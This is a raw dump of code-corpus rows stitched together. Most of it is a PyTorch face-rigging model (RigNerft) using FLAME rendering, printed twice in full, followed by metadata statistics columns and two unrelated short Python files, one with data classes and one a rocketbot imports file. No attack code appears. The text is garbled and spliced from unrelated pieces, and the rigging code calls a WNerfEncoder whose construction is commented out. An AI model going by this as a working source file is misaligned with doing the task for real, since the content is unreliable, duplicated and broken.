AlbedoEncoder.load_state_dict(torch.load(weight))
return AlbedoEncoder
def build_LitEncoder(self, weight = ''):
LitEncoder = th.nn.Sequential(
LinearWN( self.lit_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for LitEncoder network')
LitEncoder.load_state_dict(torch.load(weight))
return LitEncoder
def build_WNerfDecoder(self, weight = ''):
WNerfDecoder = th.nn.Sequential(
LinearWN( 512 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.nerf_latent_dim ),
)
if len(weight) > 0:
print ('loading weights for WNerfDecoder network')
WNerfDecoder.load_state_dict(torch.load(weight))
return WNerfDecoder
def _setup_renderer(self):
mesh_file = '/home/uss00022/lelechen/basic/flame_data/data/head_template_mesh.obj'
self.render = Renderer(self.image_size, obj_filename=mesh_file).to('cuda')
def rig(self,wgan, wnerf, p):
shapecode, expcode, albedocode, litcode = p[0], p[1],p[2], p[3]
lgan = self.WGanEncoder(wgan)
lshape = self.ShapeEncoder(shapecode)
lexp = self.ExpEncoder(expcode)
deltagan = self.WGanDecoder(torch.cat([lgan, lshape, lexp], axis = 1))
lnerf = self.WNerfEncoder(wnerf)
lalbedo = self.AlbedoEncoder(albedocode)
llit = self.LitEncoder(litcode.view(-1, 27))
deltanerf = self.WNerfDecoder(torch.cat([lnerf, lalbedo, llit], axis = 1))
return deltanerf + wnerf, deltagan + wgan
def flame_render(self,p, pose, cam):
shapecode,expcode,albedocode, litcode = p[0],p[1],p[2],p[3]
vertices, landmarks2d, landmarks3d = self.flame(shape_params=shapecode, expression_params=expcode, pose_params=pose)
trans_vertices = util.batch_orth_proj(vertices, cam)
trans_vertices[..., 1:] = - trans_vertices[..., 1:]
## render
albedos = self.flametex(albedocode, self.image_size) / 255.
ops = self.render(vertices, trans_vertices, albedos, litcode)
predicted_images = ops['images']
return landmarks3d, predicted_images
def forward(self, shape_latent_v, appearance_latent_v, shape_latent_w, appearance_latent_w, \
cam_v=None, pose_v=None, flameshape_v = None, flameexp_v = None, flametex_v = None,\
flamelit_v = None, cam_w=None, pose_w=None, flameshape_w = None, flameexp_w = None, flametex_w = None, flamelit_w = None):
p_v = self.latent2params(shape_latent_v, appearance_latent_v)
p_w = self.latent2params(shape_latent_w, appearance_latent_w)
# if we input paired WGan and WNerf with P, output same WGan & Wnerf
shape_latent_w_same, appearance_latent_w_same = self.rig(appearance_latent_w, shape_latent_w, p_w)
p_w_same = self.latent2params(shape_latent_w_same, appearance_latent_w_same)
# randomly choose one params to be edited
choice = torch.randint(0, 4 ,(1,)).item()
# if we input WGan and Wnerf, and P_v, output hat_WGan, hat_WNerf
p_w_replaced = []
for i in range(4):
if i != choice:
p_w_replaced.append(p_w[i])
else:
p_w_replaced.append(p_v[i])
shape_latent_w_hat, appearance_latent_w_hat = self.rig(appearance_latent_w, shape_latent_w, p_w_replaced)
# map chagned w back to P
p_w_mapped = self.latent2params(shape_latent_w_hat, appearance_latent_w_hat)
p_v_ = []
p_w_ = []
for j in range(4):
if j != choice:
p_w_.append(p_w_mapped[j])
p_v_.append(p_v[j])
else:
p_w_.append(p_w[j])
p_v_.append(p_w_mapped[j])
landmark_same, render_img_same = self.flame_render(p_w_same, pose_w, cam_w)
landmark_w_, render_img_w_ = self.flame_render(p_w_, pose_w, cam_w)
landmark_v_, render_img_v_ = self.flame_render(p_v_, pose_v, cam_v)
if flameshape_v != None:
p_v_vis = [flameshape_v, flameexp_v, flametex_v, flamelit_v.view(-1, 9,3)]
p_w_vis = [flameshape_w, flameexp_w, flametex_w, flamelit_w.view(-1, 9,3)]
_, recons_images_v = self.flame_render(p_v_vis, pose_v, cam_v)
_, recons_images_w = self.flame_render(p_w_vis, pose_w, cam_w)
else:
recons_images_v = render_img_w_
recons_images_w = render_img_w_
return landmark_same, render_img_same, \
landmark_w_, render_img_w_ , \
landmark_v_, render_img_v_ , \
recons_images_v, recons_images_w
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
class RigNerft(nn.Module):
def __init__(self, flame_config, opt ):
super().__init__()
self.opt = opt
self.nerf_latent_dim = 256
self.gan_latent_dim = 512
self.shape_dim = 100
self.exp_dim = 50
self.albedo_dim = 50
self.lit_dim = 27
self.flame_config = flame_config
self.image_size = self.flame_config.image_size
# funtion F networks
latent2code = Latent2Code(flame_config, opt)
self.Latent2ShapeExpCode, self.latent2shape, \
self.latent2exp, self.Latent2AlbedoLitCode, \
self.latent2albedo, self.latent2lit = self.get_f(latent2code)
# rigNet
# appearance part
self.WGanEncoder = self.build_WGanEncoder(weight = '' if opt.isTrain else opt.WGanEncoder_weight )
self.ShapeEncoder = self.build_ShapeEncoder(weight = '' if opt.isTrain else opt.ShapeEncoder_weight )
self.ExpEncoder = self.build_ExpEncoder(weight = '' if opt.isTrain else opt.ExpEncoder_weight )
self.WGanDecoder = self.build_WGanDecoder(weight = '' if opt.isTrain else opt.WGanDecoder_weight )
# shape part
# self.WNerfEncoder = self.build_WNerfEncoder(weight = '' if opt.isTrain else opt.WNerfEncoder_weight )
self.AlbedoEncoder = self.build_AlbedoEncoder(weight = '' if opt.isTrain else opt.AlbedoEncoder_weight )
self.LitEncoder = self.build_LitEncoder(weight = '' if opt.isTrain else opt.LitEncoder_weight )
self.WNerfDecoder = self.build_WNerfDecoder(weight = '' if opt.isTrain else opt.WNerfDecoder_weight )
# Flame
self.flame = FLAME(self.flame_config).to('cuda')
self.flametex = FLAMETex(self.flame_config).to('cuda')
self._setup_renderer()
self.ckpt_path = os.path.join(opt.checkpoints_dir, opt.name)
os.makedirs(self.ckpt_path, exist_ok = True)
def get_f(self,network):
print (network)
print ('loading weights for Latent2ShapeExpCode feature extraction network')
network.Latent2ShapeExpCode.load_state_dict(torch.load(self.opt.Latent2ShapeExpCode_weight))
print ('loading weights for latent2shape feature extraction network')
network.latent2shape.load_state_dict(torch.load(self.opt.latent2shape_weight))
print ('loading weights for latent2exp feature extraction network')
network.latent2exp.load_state_dict(torch.load(self.opt.latent2exp_weight))
print ('loading weights for Latent2AlbedoLitCode feature extraction network')
network.Latent2AlbedoLitCode.load_state_dict(torch.load(self.opt.Latent2AlbedoLitCode_weight))
print ('loading weights for latent2albedo feature extraction network')
network.latent2albedo.load_state_dict(torch.load(self.opt.latent2albedo_weight))
print ('loading weights for latent2albedo feature extraction network')
network.latent2lit.load_state_dict(torch.load(self.opt.latent2lit_weight))
return network.Latent2ShapeExpCode, network.latent2shape, network.latent2exp, \
network.Latent2AlbedoLitCode, network.latent2albedo, network.latent2lit
def latent2params(self, shape_latent, appearance_latent):
shape_fea = self.Latent2ShapeExpCode(shape_latent)
shapecode = self.latent2shape(shape_fea)
expcode = self.latent2exp(shape_fea)
app_fea = self.Latent2AlbedoLitCode(appearance_latent)
albedocode = self.latent2albedo(app_fea)
litcode = self.latent2lit(app_fea).view(shape_latent.shape[0], 9,3)
paramset = [shapecode, expcode, albedocode, litcode]
return paramset
def build_WGanEncoder(self, weight = ''):
WGanEncoder = th.nn.Sequential(
LinearWN( self.gan_latent_dim , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for WGanEncoder network')
WGanEncoder.load_state_dict(torch.load(weight))
return WGanEncoder
def build_ShapeEncoder(self, weight = ''):
ShapeEncoder = th.nn.Sequential(
LinearWN( self.shape_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for ShapeEncoder network')
ShapeEncoder.load_state_dict(torch.load(weight))
return ShapeEncoder
def build_ExpEncoder(self, weight = ''):
ExpEncoder = th.nn.Sequential(
LinearWN( self.exp_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for ExpEncoder network')
ExpEncoder.load_state_dict(torch.load(weight))
return ExpEncoder
def build_WGanDecoder(self, weight = ''):
WGanDecoder = th.nn.Sequential(
LinearWN( 512 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.gan_latent_dim ),
)
if len(weight) > 0:
print ('loading weights for WGanDecoder network')
WGanDecoder.load_state_dict(torch.load(weight))
return WGanDecoder
def build_WNerfEncoder(self, weight = ''):
WNerfEncoder = th.nn.Sequential(
LinearWN( self.nerf_latent_dim , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, 256 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for WNerfEncoder network')
WNerfEncoder.load_state_dict(torch.load(weight))
return WNerfEncoder
def build_AlbedoEncoder(self, weight = ''):
AlbedoEncoder = th.nn.Sequential(
LinearWN( self.albedo_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for AlbedoEncoder network')
AlbedoEncoder.load_state_dict(torch.load(weight))
return AlbedoEncoder
def build_LitEncoder(self, weight = ''):
LitEncoder = th.nn.Sequential(
LinearWN( self.lit_dim , 128 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 128, 128 ),
th.nn.LeakyReLU( 0.2, inplace = True )
)
if len(weight) > 0:
print ('loading weights for LitEncoder network')
LitEncoder.load_state_dict(torch.load(weight))
return LitEncoder
def build_WNerfDecoder(self, weight = ''):
WNerfDecoder = th.nn.Sequential(
LinearWN( 512 , 256 ),
th.nn.LeakyReLU( 0.2, inplace = True ),
LinearWN( 256, self.nerf_latent_dim ),
)
if len(weight) > 0:
print ('loading weights for WNerfDecoder network')
WNerfDecoder.load_state_dict(torch.load(weight))
return WNerfDecoder
def _setup_renderer(self):
mesh_file = '/home/uss00022/lelechen/basic/flame_data/data/head_template_mesh.obj'
self.render = Renderer(self.image_size, obj_filename=mesh_file).to('cuda')
def rig(self,wgan, wnerf, p):
shapecode, expcode, albedocode, litcode = p[0], p[1],p[2], p[3]
lgan = self.WGanEncoder(wgan)
lshape = self.ShapeEncoder(shapecode)
lexp = self.ExpEncoder(expcode)
deltagan = self.WGanDecoder(torch.cat([lgan, lshape, lexp], axis = 1))
lnerf = self.WNerfEncoder(wnerf)
lalbedo = self.AlbedoEncoder(albedocode)
llit = self.LitEncoder(litcode.view(-1, 27))
deltanerf = self.WNerfDecoder(torch.cat([lnerf, lalbedo, llit], axis = 1))
return deltanerf + wnerf, deltagan + wgan
def flame_render(self,p, pose, cam):
shapecode,expcode,albedocode, litcode = p[0],p[1],p[2],p[3]
vertices, landmarks2d, landmarks3d = self.flame(shape_params=shapecode, expression_params=expcode, pose_params=pose)
trans_vertices = util.batch_orth_proj(vertices, cam)
trans_vertices[..., 1:] = - trans_vertices[..., 1:]
## render
albedos = self.flametex(albedocode, self.image_size) / 255.
ops = self.render(vertices, trans_vertices, albedos, litcode)
predicted_images = ops['images']
return landmarks3d, predicted_images
def forward(self, shape_latent_v, appearance_latent_v, shape_latent_w, appearance_latent_w, \
cam_v=None, pose_v=None, flameshape_v = None, flameexp_v = None, flametex_v = None,\
flamelit_v = None, cam_w=None, pose_w=None, flameshape_w = None, flameexp_w = None, flametex_w = None, flamelit_w = None):
p_v = self.latent2params(shape_latent_v, appearance_latent_v)
p_w = self.latent2params(shape_latent_w, appearance_latent_w)
# if we input paired WGan and WNerf with P, output same WGan & Wnerf
shape_latent_w_same, appearance_latent_w_same = self.rig(appearance_latent_w, shape_latent_w, p_w)
p_w_same = self.latent2params(shape_latent_w_same, appearance_latent_w_same)
# randomly choose one params to be edited
choice = torch.randint(0, 4 ,(1,)).item()
# if we input WGan and Wnerf, and P_v, output hat_WGan, hat_WNerf
p_w_replaced = []
for i in range(4):
if i != choice:
p_w_replaced.append(p_w[i])
else:
p_w_replaced.append(p_v[i])
shape_latent_w_hat, appearance_latent_w_hat = self.rig(appearance_latent_w, shape_latent_w, p_w_replaced)
# map chagned w back to P
p_w_mapped = self.latent2params(shape_latent_w_hat, appearance_latent_w_hat)
p_v_ = []
p_w_ = []
for j in range(4):
if j != choice:
p_w_.append(p_w_mapped[j])
p_v_.append(p_v[j])
else:
p_w_.append(p_w[j])
p_v_.append(p_w_mapped[j])
landmark_same, render_img_same = self.flame_render(p_w_same, pose_w, cam_w)
landmark_w_, render_img_w_ = self.flame_render(p_w_, pose_w, cam_w)
landmark_v_, render_img_v_ = self.flame_render(p_v_, pose_v, cam_v)
if flameshape_v != None:
p_v_vis = [flameshape_v, flameexp_v, flametex_v, flamelit_v.view(-1, 9,3)]
p_w_vis = [flameshape_w, flameexp_w, flametex_w, flamelit_w.view(-1, 9,3)]
_, recons_images_v = self.flame_render(p_v_vis, pose_v, cam_v)
_, recons_images_w = self.flame_render(p_w_vis, pose_w, cam_w)
else:
recons_images_v = render_img_w_
recons_images_w = render_img_w_
return landmark_same, render_img_same, \
landmark_w_, render_img_w_ , \
landmark_v_, render_img_v_ , \
recons_images_v, recons_images_w
def _initialize_weights(self):
for m in self.modules():
if isinstance(m, nn.Conv2d):
nn.init.kaiming_normal_(m.weight, mode='fan_out', nonlinearity='relu')
if m.bias is not None:
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.BatchNorm2d):
nn.init.constant_(m.weight, 1)
nn.init.constant_(m.bias, 0)
elif isinstance(m, nn.Linear):
nn.init.normal_(m.weight, 0, 0.01)
nn.init.constant_(m.bias, 0)
| 44.658049 | 142 | 0.626092 | 4,487 | 38,004 | 5.091821 | 0.054379 | 0.012606 | 0.025605 | 0.027575 | 0.959776 | 0.957806 | 0.956712 | 0.954348 | 0.949621 | 0.949621 | 0 | 0.029334 | 0.274313 | 38,004 | 850 | 143 | 44.710588 | 0.799086 | 0.019077 | 0 | 0.90056 | 0 | 0 | 0.069865 | 0.00921 | 0 | 0 | 0 | 0 | 0 | 1 | 0.071429 | false | 0 | 0.030812 | 0 | 0.162465 | 0.057423 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
56d7c4899ce8db83258e66b99b1c0e4ee1dbe768 | 329 | py | Python | xadmin/demo_app/app/obj.py | HelloN1co/A-Detection-Tool-for-Traffic-Objects | ead815d3968559dd640257ca946f86ad390495b6 | [
"MIT"
] | null | null | null | xadmin/demo_app/app/obj.py | HelloN1co/A-Detection-Tool-for-Traffic-Objects | ead815d3968559dd640257ca946f86ad390495b6 | [
"MIT"
] | null | null | null | xadmin/demo_app/app/obj.py | HelloN1co/A-Detection-Tool-for-Traffic-Objects | ead815d3968559dd640257ca946f86ad390495b6 | [
"MIT"
] | null | null | null | class His:
id = 0
mid = 0
category = ''
name = ''
srcFilePath = ''
destFilePath = ''
thumnail = ''
result = ''
create_time = ''
class Col:
id = 0
mid = 0
category = ''
name = ''
srcFilePath = ''
destFilePath = ''
thumnail = ''
result = ''
create_time = ''
| 14.954545 | 21 | 0.455927 | 28 | 329 | 5.285714 | 0.5 | 0.040541 | 0.081081 | 0.094595 | 0.891892 | 0.891892 | 0.891892 | 0.891892 | 0.891892 | 0.891892 | 0 | 0.020202 | 0.398176 | 329 | 21 | 22 | 15.666667 | 0.727273 | 0 | 0 | 0.9 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
856e3cd9e18f20a2184e4d12bb69b777b01be7e5 | 322 | py | Python | rocketbot/commands/__init__.py | corewire/rocketbot | a74d7d329b92204fe80bed120edfa0ee0222b321 | [
"MIT"
] | 3 | 2020-01-28T09:30:42.000Z | 2021-06-29T14:56:07.000Z | rocketbot/commands/__init__.py | corewire/rocketbot | a74d7d329b92204fe80bed120edfa0ee0222b321 | [
"MIT"
] | 2 | 2021-02-26T20:42:49.000Z | 2021-03-04T13:59:01.000Z | rocketbot/commands/__init__.py | corewire/rocketbot | a74d7d329b92204fe80bed120edfa0ee0222b321 | [
"MIT"
] | 2 | 2020-01-28T09:36:56.000Z | 2021-09-10T12:18:14.000Z | from rocketbot.commands.base import BaseCommand # noqa: F401
from rocketbot.commands.catchall import ( # noqa: F401
CatchAll, private_message_user
)
from rocketbot.commands.ping import Ping # noqa: F401
from rocketbot.commands.poll import Poll # noqa: F401
from rocketbot.commands.usage import Usage # noqa: F401
| 40.25 | 61 | 0.782609 | 43 | 322 | 5.813953 | 0.348837 | 0.26 | 0.42 | 0.252 | 0.348 | 0 | 0 | 0 | 0 | 0 | 0 | 0.054545 | 0.145963 | 322 | 7 | 62 | 46 | 0.854545 | 0.167702 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.714286 | 0 | 0.714286 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.